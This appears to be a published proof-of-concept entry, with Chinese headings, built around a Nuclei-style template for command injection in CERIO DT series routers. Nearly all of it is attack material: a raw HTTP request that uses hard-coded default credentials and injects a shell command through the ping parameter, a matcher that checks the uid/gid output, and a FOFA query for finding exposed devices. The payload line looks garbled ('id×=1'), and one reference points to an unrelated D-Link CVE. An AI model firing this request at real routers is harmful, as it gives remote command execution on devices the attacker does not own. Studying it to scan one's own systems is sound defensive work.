漏洞描述
CERIO DT series routers have an operation command injection vulnerability in specific versions. An attacker could exploit this vulnerability to execute commands.
cerio-dt-rce: CERIO-DT Interface - Command Execution
PoC代码[已公开]
id: cerio-dt-rce
info:
name: CERIO-DT Interface - Command Execution
author: pussycat0x
severity: critical
description: |
CERIO DT series routers have an operation command injection vulnerability in specific versions. An attacker could exploit this vulnerability to execute commands.
reference:
- https://github.com/20142995/sectool
- https://github.com/tanjiti/sec_profile
- https://github.com/wy876/POC/blob/main/D-Link_DAR-8000%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E(CVE-2023-4542).md
metadata:
verified: true
max-request: 1
fofa-query: title="DT-100G-N" || title="DT-300N" || title="DT-100G" || title="AMR-3204G" || title="WMR-200N"
tags: cerio,rce,vuln
http:
- raw:
- |
POST /cgi-bin/Save.cgi?cgi=PING HTTP/1.1
Host: {{Hostname}}
Authorization: Basic b3BlcmF0b3I6MTIzNA==
Content-Type: application/x-www-form-urlencoded
pid=2061&ip=127.0.0.1;id×=1
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
- type: status
status:
- 200
# digest: 4a0a00473045022100b0da6fd310945dd998215d93c7105ffad97d05225163f10ad43912863903b8640220247200410c644b2b11830ebb6e0ac3148b82006899358847038aa31dfba25c17:922c64590222798bb761d5b6d8e72950